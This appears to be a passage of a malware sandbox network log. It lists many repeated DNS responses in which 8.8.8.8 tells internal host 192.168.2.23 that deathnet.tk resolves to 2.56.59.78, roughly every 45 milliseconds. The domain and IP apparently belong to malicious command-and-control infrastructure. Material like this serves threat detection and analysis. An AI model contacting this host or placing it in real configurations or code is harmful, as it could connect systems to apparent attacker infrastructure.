              Mar 21, 2022 20:09:24.681828022 CET8.8.8.8192.168.2.230x48c4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.729392052 CET8.8.8.8192.168.2.230xdda0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.772576094 CET8.8.8.8192.168.2.230x327cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.817950010 CET8.8.8.8192.168.2.230x58f9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.862596989 CET8.8.8.8192.168.2.230x88beNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.907330990 CET8.8.8.8192.168.2.230xbe98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.951153040 CET8.8.8.8192.168.2.230xe8cdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:24.996037960 CET8.8.8.8192.168.2.230x28c7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.039100885 CET8.8.8.8192.168.2.230x7ae7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.085596085 CET8.8.8.8192.168.2.230x8fa4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.135737896 CET8.8.8.8192.168.2.230xa319No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.184777021 CET8.8.8.8192.168.2.230x9ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.232629061 CET8.8.8.8192.168.2.230x8df4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.277189016 CET8.8.8.8192.168.2.230xdb94No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.319960117 CET8.8.8.8192.168.2.230xbf28No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.365209103 CET8.8.8.8192.168.2.230xadf1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.410206079 CET8.8.8.8192.168.2.230xf246No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.455017090 CET8.8.8.8192.168.2.230xe69eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.510551929 CET8.8.8.8192.168.2.230x4790No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.557846069 CET8.8.8.8192.168.2.230x557eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.605154037 CET8.8.8.8192.168.2.230x5ec9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.654241085 CET8.8.8.8192.168.2.230x4b3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.710469961 CET8.8.8.8192.168.2.230x46dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.758548975 CET8.8.8.8192.168.2.230xc59cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.806552887 CET8.8.8.8192.168.2.230x9453No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.852705956 CET8.8.8.8192.168.2.230xfd95No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.899264097 CET8.8.8.8192.168.2.230xdc89No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.944729090 CET8.8.8.8192.168.2.230x37e7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:25.990279913 CET8.8.8.8192.168.2.230x38bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.042181969 CET8.8.8.8192.168.2.230x6ebaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.090877056 CET8.8.8.8192.168.2.230x5a7eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.137561083 CET8.8.8.8192.168.2.230xd01cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.182864904 CET8.8.8.8192.168.2.230x6621No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.229490995 CET8.8.8.8192.168.2.230x60a8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.274290085 CET8.8.8.8192.168.2.230xee16No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.324271917 CET8.8.8.8192.168.2.230x4144No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.367264986 CET8.8.8.8192.168.2.230xbf91No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.413147926 CET8.8.8.8192.168.2.230xfd49No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.458529949 CET8.8.8.8192.168.2.230xc711No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.504894972 CET8.8.8.8192.168.2.230x9ee1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.549355030 CET8.8.8.8192.168.2.230x5329No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.594326019 CET8.8.8.8192.168.2.230xde1bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.638712883 CET8.8.8.8192.168.2.230xc391No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.683243990 CET8.8.8.8192.168.2.230x812aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.728626013 CET8.8.8.8192.168.2.230x7602No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.771903992 CET8.8.8.8192.168.2.230x4e32No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.815556049 CET8.8.8.8192.168.2.230xb0b3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.858875990 CET8.8.8.8192.168.2.230x7e75No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.902964115 CET8.8.8.8192.168.2.230xeae1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.949891090 CET8.8.8.8192.168.2.230xf9d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:26.993097067 CET8.8.8.8192.168.2.230x8584No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.036978006 CET8.8.8.8192.168.2.230xc03cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.082998991 CET8.8.8.8192.168.2.230x13dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.125782967 CET8.8.8.8192.168.2.230x4598No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.170876026 CET8.8.8.8192.168.2.230x1056No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.214889050 CET8.8.8.8192.168.2.230x5c36No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.264906883 CET8.8.8.8192.168.2.230xd91dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.310317039 CET8.8.8.8192.168.2.230xcadcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.354799986 CET8.8.8.8192.168.2.230xe809No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.400374889 CET8.8.8.8192.168.2.230x533aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.448178053 CET8.8.8.8192.168.2.230x1c2dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.493160963 CET8.8.8.8192.168.2.230x4439No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.545191050 CET8.8.8.8192.168.2.230x7574No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.589668989 CET8.8.8.8192.168.2.230xb07cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.632553101 CET8.8.8.8192.168.2.230x3369No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.679512978 CET8.8.8.8192.168.2.230x2290No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.727207899 CET8.8.8.8192.168.2.230xc7fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.772157907 CET8.8.8.8192.168.2.230x74aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.817220926 CET8.8.8.8192.168.2.230x29fbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.862858057 CET8.8.8.8192.168.2.230x9c89No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.906788111 CET8.8.8.8192.168.2.230xc0aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:27.956243992 CET8.8.8.8192.168.2.230x37ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.003647089 CET8.8.8.8192.168.2.230xecbdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.048271894 CET8.8.8.8192.168.2.230xd7e2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.094248056 CET8.8.8.8192.168.2.230x5770No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.138067961 CET8.8.8.8192.168.2.230x78eeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.180243969 CET8.8.8.8192.168.2.230x57bbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.224870920 CET8.8.8.8192.168.2.230x4b84No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.270569086 CET8.8.8.8192.168.2.230xe1f2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.314757109 CET8.8.8.8192.168.2.230x2409No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.362899065 CET8.8.8.8192.168.2.230x9409No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.411241055 CET8.8.8.8192.168.2.230xf7afNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.456345081 CET8.8.8.8192.168.2.230xa8dbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.499392986 CET8.8.8.8192.168.2.230x712fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.544154882 CET8.8.8.8192.168.2.230x231bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.591860056 CET8.8.8.8192.168.2.230x71d8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.638792992 CET8.8.8.8192.168.2.230x5383No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.702883005 CET8.8.8.8192.168.2.230x14b3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.745970964 CET8.8.8.8192.168.2.230x3478No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.790334940 CET8.8.8.8192.168.2.230xcdd6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.839109898 CET8.8.8.8192.168.2.230x710eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.885910988 CET8.8.8.8192.168.2.230x7560No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.930771112 CET8.8.8.8192.168.2.230xe147No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:28.973624945 CET8.8.8.8192.168.2.230xdda8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.018459082 CET8.8.8.8192.168.2.230xc4ccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.061212063 CET8.8.8.8192.168.2.230x8150No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.108843088 CET8.8.8.8192.168.2.230x4d74No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.156761885 CET8.8.8.8192.168.2.230xe24dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.204463959 CET8.8.8.8192.168.2.230x255eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.248198986 CET8.8.8.8192.168.2.230xa9eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.292859077 CET8.8.8.8192.168.2.230x5acNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.337603092 CET8.8.8.8192.168.2.230xaf10No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.380856991 CET8.8.8.8192.168.2.230x639bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.427912951 CET8.8.8.8192.168.2.230x9654No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.475816965 CET8.8.8.8192.168.2.230xd56bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.522378922 CET8.8.8.8192.168.2.230x7ac7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.567960978 CET8.8.8.8192.168.2.230xc49eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.613368988 CET8.8.8.8192.168.2.230x9565No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.685230970 CET8.8.8.8192.168.2.230xe4c6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.732105017 CET8.8.8.8192.168.2.230x572eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.778266907 CET8.8.8.8192.168.2.230x8172No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.826375961 CET8.8.8.8192.168.2.230x34fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.873832941 CET8.8.8.8192.168.2.230x7e0fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.920562983 CET8.8.8.8192.168.2.230x694dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:29.969527006 CET8.8.8.8192.168.2.230xfb35No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.016110897 CET8.8.8.8192.168.2.230xb30aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.070244074 CET8.8.8.8192.168.2.230xb6c4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.118590117 CET8.8.8.8192.168.2.230x3fdaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.166234016 CET8.8.8.8192.168.2.230xdf2bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.211472988 CET8.8.8.8192.168.2.230x5f8dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.278898954 CET8.8.8.8192.168.2.230x23b7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.324274063 CET8.8.8.8192.168.2.230xcccaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.369019985 CET8.8.8.8192.168.2.230xc8dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.413974047 CET8.8.8.8192.168.2.230x2816No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.461971045 CET8.8.8.8192.168.2.230x7024No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.507859945 CET8.8.8.8192.168.2.230xb352No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.553633928 CET8.8.8.8192.168.2.230x4aa8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.598463058 CET8.8.8.8192.168.2.230xbd4cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.646462917 CET8.8.8.8192.168.2.230x4766No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.695035934 CET8.8.8.8192.168.2.230xb5bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.742789030 CET8.8.8.8192.168.2.230x6e81No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.789923906 CET8.8.8.8192.168.2.230x4340No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.834306955 CET8.8.8.8192.168.2.230xdb6fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.878959894 CET8.8.8.8192.168.2.230xc33bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.923356056 CET8.8.8.8192.168.2.230x5110No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:30.968388081 CET8.8.8.8192.168.2.230xf1a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.011698961 CET8.8.8.8192.168.2.230xab9bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.054692984 CET8.8.8.8192.168.2.230x79f5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.100097895 CET8.8.8.8192.168.2.230xc30aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.145468950 CET8.8.8.8192.168.2.230xf73dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.189909935 CET8.8.8.8192.168.2.230xa060No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.234569073 CET8.8.8.8192.168.2.230x7a00No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.280762911 CET8.8.8.8192.168.2.230x6764No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.329389095 CET8.8.8.8192.168.2.230x15b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.377490997 CET8.8.8.8192.168.2.230xf0f0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.420681953 CET8.8.8.8192.168.2.230x14d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.465626001 CET8.8.8.8192.168.2.230x30d8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.510725975 CET8.8.8.8192.168.2.230x399fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.554583073 CET8.8.8.8192.168.2.230x233fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.608850002 CET8.8.8.8192.168.2.230x66d4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.662755013 CET8.8.8.8192.168.2.230x86b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.709249020 CET8.8.8.8192.168.2.230x41d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.752130032 CET8.8.8.8192.168.2.230x52a7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.797621965 CET8.8.8.8192.168.2.230x3fc6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.842437029 CET8.8.8.8192.168.2.230x514eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.885788918 CET8.8.8.8192.168.2.230x8a7eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.932501078 CET8.8.8.8192.168.2.230xb5eaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:31.980596066 CET8.8.8.8192.168.2.230xc69eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.026617050 CET8.8.8.8192.168.2.230x7d5dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.072073936 CET8.8.8.8192.168.2.230xf4e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.115334988 CET8.8.8.8192.168.2.230x86d9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.162846088 CET8.8.8.8192.168.2.230xdd74No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.207808018 CET8.8.8.8192.168.2.230xd06No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.256094933 CET8.8.8.8192.168.2.230xa20dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.302943945 CET8.8.8.8192.168.2.230x89e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.348172903 CET8.8.8.8192.168.2.230xdf12No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.392355919 CET8.8.8.8192.168.2.230xb20aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.438344955 CET8.8.8.8192.168.2.230xdc12No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.488554001 CET8.8.8.8192.168.2.230xfffbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.534382105 CET8.8.8.8192.168.2.230xf998No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.579338074 CET8.8.8.8192.168.2.230x382dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.624392033 CET8.8.8.8192.168.2.230xffcdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.670931101 CET8.8.8.8192.168.2.230x334fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.720345974 CET8.8.8.8192.168.2.230x15c2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.774986982 CET8.8.8.8192.168.2.230xd29cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.821211100 CET8.8.8.8192.168.2.230xffc4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.869947910 CET8.8.8.8192.168.2.230x11d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.914895058 CET8.8.8.8192.168.2.230x42d7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:32.959827900 CET8.8.8.8192.168.2.230xcd48No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.006861925 CET8.8.8.8192.168.2.230xc6c4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.052989006 CET8.8.8.8192.168.2.230x1c7dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.097563028 CET8.8.8.8192.168.2.230x4117No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.142648935 CET8.8.8.8192.168.2.230x22b7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.185683012 CET8.8.8.8192.168.2.230x6b57No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.228374004 CET8.8.8.8192.168.2.230x1a1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.277013063 CET8.8.8.8192.168.2.230xe6feNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.321130037 CET8.8.8.8192.168.2.230xe142No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.365897894 CET8.8.8.8192.168.2.230x1164No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.410991907 CET8.8.8.8192.168.2.230x2332No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.455692053 CET8.8.8.8192.168.2.230xab95No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.499265909 CET8.8.8.8192.168.2.230xe188No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.544867039 CET8.8.8.8192.168.2.230x9f42No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.594125032 CET8.8.8.8192.168.2.230xb039No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.652620077 CET8.8.8.8192.168.2.230x8523No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.698656082 CET8.8.8.8192.168.2.230xa9ebNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.743871927 CET8.8.8.8192.168.2.230x564bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.786875010 CET8.8.8.8192.168.2.230x6128No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.836891890 CET8.8.8.8192.168.2.230xcca9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.881820917 CET8.8.8.8192.168.2.230x2b3eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
